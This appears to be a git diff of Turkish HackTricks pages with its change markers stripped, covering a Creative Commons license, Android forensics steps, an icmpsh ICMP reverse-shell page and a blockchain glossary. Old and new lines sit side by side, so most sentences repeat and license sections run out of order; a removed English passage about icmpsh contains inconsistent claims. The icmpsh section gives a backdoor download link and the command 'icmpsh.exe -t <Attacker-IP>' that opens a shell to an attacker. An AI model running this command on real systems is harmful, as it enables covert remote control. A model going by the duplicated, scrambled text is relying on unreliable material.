v. Lisanslı Materyalin URI'si veya bağlantısını mümkün olduğunca içermelisiniz;
B. Lisanslı Malzemeyi değiştirdiyseniz bunu belirtin ve önceki değişikliklerin bir göstergesini koruyun;
B. Lisanslı Materyali değiştirdiyseniz belirtmeli ve önceki değişikliklerin bir göstergesini saklamalısınız; ve
C. Lisanslı Malzemenin bu Kamu Lisansı altında lisanslandığını ve bu Kamu Lisansının metnini veya URI veya hiperbağlantısını içerir şekilde belirtin.
C. Lisanslı Materyalin bu Kamu Lisansı altında lisanslandığını belirtmeli ve bu Kamu Lisansının metnini veya URI'sini veya bağlantısını içermelisiniz.
2. Lisanslı Malzemeyi Paylaşırken, Bölüm 3(a)(1)'deki koşulları, ortam, yöntem ve bağlam temelinde herhangi bir makul şekilde yerine getirebilirsiniz. Örneğin, gereken bilgileri içeren bir kaynağa URI veya hiperbağlantı sağlayarak koşulları yerine getirmek makul olabilir.
2. Bölüm 3(a)(1) koşullarını, Lisanslı Materyali Paylaştığınız ortama, araca ve bağlama dayalı olarak makul bir şekilde yerine getirebilirsiniz. Örneğin, gerekli bilgileri içeren bir kaynağa URI veya bağlantı sağlayarak koşulları yerine getirmek makul olabilir.
3. Lisansör tarafından talep edilmesi halinde, Bölüm 3(a)(1)(A) tarafından gereken bilgilerin mümkün olduğunca kaldırmanız gerekmektedir.
3. Lisans Sahibi tarafından talep edilmesi halinde, Bölüm 3(a)(1)(A) tarafından gerekli görülen bilgilerden herhangi birini mümkün olduğunca kaldırmalısınız.
4. Ürettiğiniz Uyarlanmış Malzemeyi Paylaşırsanız, Uyarlayıcı Lisansı, Uyarlanmış Malzemenin alıcılarının bu Kamu Lisansına uyum sağlamasını engellememelidir.
4. Ürettiğiniz Uyarlanmış Materyali Paylaşırsanız, Uyarlama Lisansı'nın, Uyarlanmış Materyalin alıcılarının bu Kamu Lisansına uyum sağlamasını engellememesi gerekir.
## Bölüm 4 - Sui Generis Veritabanı Hakları.
## Bölüm 4 Sui Generis Veritabanı Hakları.
Lisanslı Haklar, Lisanslı Malzemenin kullanımınıza uygulanan Sui Generis Veritabanı Haklarını içeriyorsa:
Lisanslı Haklarınızın kullanımınıza tabi olan Sui Generis Veritabanı Haklarını içeriyorsa:
a. Şüpheye mahal vermemek için, Bölüm 2(a)(1), Ticari Olmayan amaçlarla veritabanının içeriğinin tamamını veya önemli bir kısmını çıkarma, yeniden kullanma, çoğaltma ve Paylaşma hakkını size verir;
a. Şüpheye mahal vermemek için, Bölüm 2(a)(1) size veritabanının içeriğinin tamamını veya önemli bir kısmını Kar Amacı Gütmeyen amaçlar için çıkarma, yeniden kullanma, çoğaltma ve Paylaşma hakkı verir;
b. Sui Generis Veritabanı Haklarına sahip olduğunuz bir veritabanına veritabanının içeriğinin tamamını veya önemli bir kısmını dahil ederseniz, Sui Generis Veritabanı Haklarına sahip olduğunuz veritabanı (ancak içeriği değil) Uyarlanmış Malzemedir;
b. Eğer veritabanının içeriğinin tamamını veya önemli bir kısmını, Sui Generis Veritabanı Haklarına sahip olduğunuz bir veritabanına dahil ederseniz, o zaman Sui Generis Veritabanı Haklarına sahip olduğunuz veritabanı (ancak içeriği değil) Uyarlanmış Materyaldir; ve
c. Veritabanının içeriğinin tamamını veya önemli bir kısmını Paylaşırsanız, Bölüm 3(a)'daki koşullara uymalısınız.
c. Eğer veritabanının içeriğinin tamamını veya önemli bir kısmını Paylaşırsanız, Bölüm 3(a) koşullarına uymanız gerekir.
Şüpheye mahal vermemek için, Bu Bölüm 4, diğer Telif Hakkı ve Benzer Haklarınızı içeren bu Kamu Lisansı altındaki yükümlülüklerinizi tamamlamaz, bunları tamamlayıcı niteliktedir.
Şüpheye mahal vermemek için, bu Bölüm 4, Lisanslı Haklarınızın diğer Telif Hakkı ve Benzer Haklarını içeren bu Kamu Lisansı altındaki yükümlülüklerin yerine geçmez ve bunları tamamlar.
## Bölüm 5 - Garanti Reddi ve Sorumluluk Sınırlaması.
## Bölüm 5 Garanti Reddi ve Sorumluluk Sınırlaması.
a. __Lisansör tarafından ayrıca üstlenilmediği sürece, mümkün olduğunca, Lisansör, Lisanslı Malzeme'yi olduğu gibi ve mevcut durumda sunar ve Lisanslı Malzeme ile ilgili herhangi bir türde, açık, zımni, yasal veya diğer herhangi bir temsil veya garanti yapmaz. Bu, başlıca, başlık, pazarlanabilirlik, belirli bir amaca uygunluk, ihlal olmama, gizli veya diğer hataların varlığı veya yokluğu, doğruluk veya hataların varlığı veya yokluğu konusunda, bilinen veya keşfedilebilir olsun veya olmasın, garanti vermez. Garanti reddinin tamamen veya kısmen izin verilmediği durumlarda, bu reddetme size uygulanmayabilir.__
a. __Lisans Sahibi tarafından ayrıca üstlenilmediği sürece, mümkün olduğunca, Lisans Sahibi Lisanslı Materyali olduğu gibi ve mevcut olduğu gibi sunar ve Lisanslı Materyal hakkında herhangi bir türde, açık, zımni, yasal veya diğer herhangi bir garanti sunmaz. Bu, başlıca, başlık, satılabilirlik, belirli bir amaca uygunluk, ihlal edilmeme, gizli veya diğer hataların varlığı veya yokluğu, doğruluk veya hataların varlığı veya yokluğu konusunda garanti vermemeyi içerir, bilinse de bilinmese de. Garanti reddinin tamamen veya kısmen izin verilmediği durumlarda, bu reddin size uygulanmayabileceğini unutmayın.__
b. __Mümkün olduğunca, Lisansör, bu Kamu Lisansı veya Lisanslı Malzemenin kullanımı nedeniyle size herhangi bir yasal teoriye (ihmal dahil olmak üzere)
## Bölüm 7 - Diğer Şartlar ve Koşullar.
b. __Mümkün olduğunca, hiçbir durumda Lisans Sahibi, bu Kamu Lisansından veya Lisanslı Materyalin kullanımından kaynaklanan herhangi bir doğrudan, özel, dolaylı, tesadüfi, ardışık, cezai, örnek veya diğer kayıplar, maliyetler, giderler veya zararlardan dolayı size herhangi bir yasal teori (ihmal dahil) veya başka bir şekilde sorumlu olmayacaktır. Zararların, maliyetlerin, giderlerin veya zararların olasılığı hakkında Lisans Sahibinin sizi bilgilendirmiş olması durumunda bile. Sorumluluk sınırlamasının tamamen veya kısmen izin verilmediği durumlarda, bu sınırlamanın size uygulanmayabileceğini unutmayın.__
a. Lisans Veren, sizin tarafınızdan iletilen herhangi ek veya farklı şartlara bağlı olmayacaktır, ancak açıkça kabul edilirse.
c. Yukarıda sağlanan garanti reddi ve sorumluluk sınırlaması, mümkün olduğunca, en yakın şekilde mutlak bir reddi ve tüm sorumluluk feragatini temsil edecek şekilde yorumlanacaktır.
b. Burada belirtilmeyen Lisanslı Mal ile ilgili herhangi bir düzenleme, anlaşma veya anlaşma, bu Genel Lisansın şartlarından ayrı ve bağımsızdır.
## Bölüm 6 Süre ve Feshetme.
## Bölüm 8 - Yorumlama.
a. Bu Kamu Lisansı burada lisanslanan Telif Hakkı ve Benzer Haklar süresince geçerlidir. Ancak, bu Kamu Lisansına uymazsanız, o zaman bu Kamu Lisansı kapsamındaki haklarınız otomatik olarak sona erer.
a. Şüpheye mahal vermemek için, bu Genel Lisans, bu Genel Lisans altında izinsiz olarak yapılabilen Lisanslı Malın herhangi bir kullanımını azaltmaz, sınırlamaz, kısıtlamaz veya koşullandırmaz ve böyle yorumlanmamalıdır.
b. Lisans Sahibinin 6(a) Bölümü uyarınca Lisanslı Materyali kullanma hakkınız sona erdiğinde, şunlar geri yürürlüğe girer:
b. Mümkün olduğunca, bu Genel Lisansın herhangi bir hükmü uygulanamaz kabul edilirse, uygulanabilir hale getirilmesi için minimum düzeyde otomatik olarak düzeltilir. Hüküm düzeltilemezse, bu Genel Lisans'tan ayrılarak kalan hükümlerin uygulanabilirliğini etkilemeden çıkarılır.
1. ihlalin düzeltilmesi tarihinden itibaren 30 gün içinde düzeltilirse otomatik olarak; veya
c. Bu Genel Lisansın hiçbir şartı veya koşulu feragat edilmeyecek ve uyulmaması kabul edilmeyecektir, ancak Lisans Veren tarafından açıkça kabul edilirse.
2. Lisans Sahibi tarafından açıkça geri yürütmeye tabi tutulursa.
d. Bu Genel Lisansın hiçbir hükmü, Lisans Veren veya Siz tarafından uygulanan herhangi bir yetki ve dokunulmazlığı sınırlama veya feragat olarak kabul edilemez veya yorumlanamaz, herhangi bir yargı veya otoritenin yasal süreçlerinden kaynaklanan.
Şüpheye mahal vermemek için, bu Bölüm 6(b), Lisans Sahibinin bu Kamu Lisansının ihlalleriniz için çözüm arama hakkını etkilemez.
c. Şüpheye mahal vermemek için, Lisans Sahibi ayrı koşullar veya şartlar altında Lisanslı Materyali sunabilir veya Lisanslı Materyali herhangi bir zamanda dağıtmayı durdurabilir; ancak, bunu yapmak bu Kamu Lisansını sona erdirmez.
d. 1, 5, 6, 7 ve 8. Bölümler bu Kamu Lisansının sona ermesinden sonra da geçerliliğini korur.
## Bölüm 7 Diğer Şartlar ve Koşullar.
a. Lisans Veren, sizin tarafınızdan iletilen ek veya farklı şartlara bağlı olmayacaktır, açıkça kabul edilmedikçe.
b. Lisanslı Materyal ile ilgili burada belirtilmeyen herhangi bir düzenleme, anlaşma veya anlayış, bu Genel Lisansın şartlarından bağımsızdır ve ayrıdır.
## Bölüm 8 Yorum.
a. Şüpheye mahal vermemek için, bu Genel Lisans, bu Genel Lisans kapsamında izinsiz yasal olarak yapılabilen herhangi bir Lisanslı Materyal kullanımına kısıtlama getirmez, sınırlamaz, kısıtlamaz veya koşullar eklemeyecektir ve yorumlanmayacaktır.
b. Mümkün olduğunca, bu Genel Lisansın herhangi bir hükmü uygulanamaz kabul edilirse, uygulanabilir hale getirilmesi için gerekli minimum düzeye otomatik olarak yeniden düzenlenecektir. Hüküm düzeltilemezse, bu Genel Lisans'tan çıkarılacak ve kalan şartları ve koşulların uygulanabilirliğini etkilemeyecek şekilde ayrılacaktır.
c. Bu Genel Lisansın hiçbir şartı veya koşulu feragat edilmeyecek ve uyulmamasına izin verilmeyecek, açıkça kabul edilmedikçe.
d. Bu Genel Lisansın hiçbir hükmü, Lisans Veren veya Siz tarafından uygulanan herhangi bir ayrıcalık ve dokunulmazlığı sınırlama veya feragat olarak yorumlanamaz veya yorumlanamaz, herhangi bir yargı veya otoritenin yasal süreçlerinden.
```
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,32 +1,33 @@
# Android Forensik
# Android Dijital Delil İnceleme
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Kilitli Cihaz
Bir Android cihazdan veri çıkarmaya başlamak için cihazın kilidinin açık olması gerekmektedir. Eğer kilitli ise şunları yapabilirsiniz:
Bir Android cihazdan veri çıkarmaya başlamak için cihazın kilidinin açık olması gerekir. Eğer kilitli ise şunları yapabilirsiniz:
* Cihazın USB üzerinden hata ayıklamaya sahip olup olmadığını kontrol edin.
* Olası bir [parmak izi saldırısını](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) kontrol edin.
* [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) ile deneyin.
* Cihazın USB üzerinden hata ayıklama özelliğinin etkin olup olmadığını kontrol edin.
* Muhtemel bir [parmak izi saldırısını](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) kontrol edin.
* [Kaba kuvvet](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) ile deneyin.
## Veri Edinimi
## Veri Edinme
[adb kullanarak bir Android yedekleme](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) oluşturun ve [Android Yedekleme Çıkarıcısı](https://sourceforge.net/projects/adbextractor/) kullanarak çıkarın: `java -jar abe.jar unpack file.backup file.tar`
[adb kullanarak android yedekleme oluşturun](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) ve [Android Yedek Çıkartıcı](https://sourceforge.net/projects/adbextractor/) kullanarak çıkartın: `java -jar abe.jar unpack file.backup file.tar`
### Root erişimi veya fiziksel bağlantı varsa JTAG arabirimine
### Root erişimi veya JTAG arabirimine fiziksel bağlantı varsa
* `cat /proc/partitions` (flash belleğin yolunu arayın, genellikle ilk giriş _mmcblk0_ ve tüm flash belleğe karşılık gelir).
* `df /data` (Sistemin blok boyutunu keşfedin).
@ -34,18 +35,19 @@ Bir Android cihazdan veri çıkarmaya başlamak için cihazın kilidinin açık
### Bellek
RAM bilgilerini çıkarmak için Linux Memory Extractor (LiME) kullanın. Bu, adb aracılığıyla yüklenmesi gereken bir çekirdek uzantısıdır.
RAM bilgilerini çıkarmak için Linux Bellek Çıkartıcı (LiME) kullanın. Bu, adb aracılığıyla yüklenmesi gereken bir çekirdek uzantısıdır.
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,67 +1,31 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerinizi sıfırdan kahraman seviyesine yükseltmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **katkıda bulunun**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarını paylaşarak PR'lar göndererek HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}
Arka kapıyı şuradan indirin: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
Backdoor'u şuradan indirin: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
# İstemci tarafı
Komut dosyasını çalıştırın: **run.sh**
Betik dosyasını çalıştırın: **run.sh**
**Hata alırsanız, aşağıdaki satırları değiştirmeyi deneyin:**
**Eğer bir hata alırsanız, aşağıdaki satırları değiştirmeyi deneyin:**
```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
```
# ICMP Reverse Shell (icmpsh)
ICMP Reverse Shell (icmpsh) is a simple reverse shell that uses the Internet Control Message Protocol (ICMP) to establish a command and control (C2) channel between the attacker and the target machine. This technique allows the attacker to bypass firewalls and other network security measures that may be in place.
## How it works
The icmpsh tool consists of two components: the client-side and the server-side. The client-side is executed on the attacker's machine, while the server-side is executed on the target machine.
1. The client-side sends ICMP echo request packets to the target machine, containing the commands to be executed.
2. The server-side receives the ICMP echo request packets and extracts the commands.
3. The server-side executes the commands and sends the output back to the client-side in ICMP echo reply packets.
4. The client-side receives the ICMP echo reply packets and displays the output to the attacker.
## Usage
To use icmpsh, you need to have root privileges on the attacker's machine and the target machine must have ICMP echo request/reply enabled.
1. Download and compile the icmpsh tool on both the attacker's machine and the target machine.
2. Start the server-side on the target machine: `./icmpsh -s`
3. Start the client-side on the attacker's machine: `./icmpsh -c <target_ip>`
4. Once the connection is established, you can execute commands on the target machine through the client-side.
## Features
- Stealthy: ICMP traffic is often allowed through firewalls and is less likely to be detected.
- Cross-platform: icmpsh is written in C and can be compiled and executed on various operating systems.
- Encrypted communication: icmpsh supports encryption of the command and control channel using AES-256.
## Limitations
- Limited command execution: icmpsh is designed for simple command execution and does not support interactive shell sessions.
- Network limitations: icmpsh may not work in environments where ICMP traffic is heavily filtered or blocked.
- Detection: While icmpsh is stealthy, it can still be detected by advanced network monitoring tools.
## References
- [icmpsh GitHub repository](https://github.com/inquisb/icmpsh)
- [ICMP Reverse Shell with icmpsh](https://www.hackingarticles.in/icmp-reverse-shell-with-icmpsh/)
**İçin:**
```bash
echo Please insert the IP where you want to listen
read IP
@ -72,16 +36,17 @@ read IP
```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,108 +1,109 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Temel Kavramlar
- **Akıllı Sözleşmeler**, belirli koşullar sağlandığında blok zincirinde çalışan programlar olarak tanımlanır ve aracı olmadan anlaşma yürütme işlemlerini otomatikleştirir.
- **Merkezi Olmayan Uygulamalar (dApps)**, akıllı sözleşmelere dayanan, kullanıcı dostu bir ön uç ve şeffaf, denetlenebilir bir arka uç içeren uygulamalardır.
- **Tokenlar ve Coinler**, coinlerin dijital para olarak hizmet verirken, tokenların belirli bağlamlarda değer veya sahiplik temsil ettiği farklılık gösterir.
- **Fayda Tokenları**, hizmetlere erişim sağlarken, **Güvenlik Tokenları** varlık sahipliğini belirtir.
- **DeFi**, merkezi otoritelere ihtiyaç duymadan finansal hizmetler sunan Decentralized Finance'ı ifade eder.
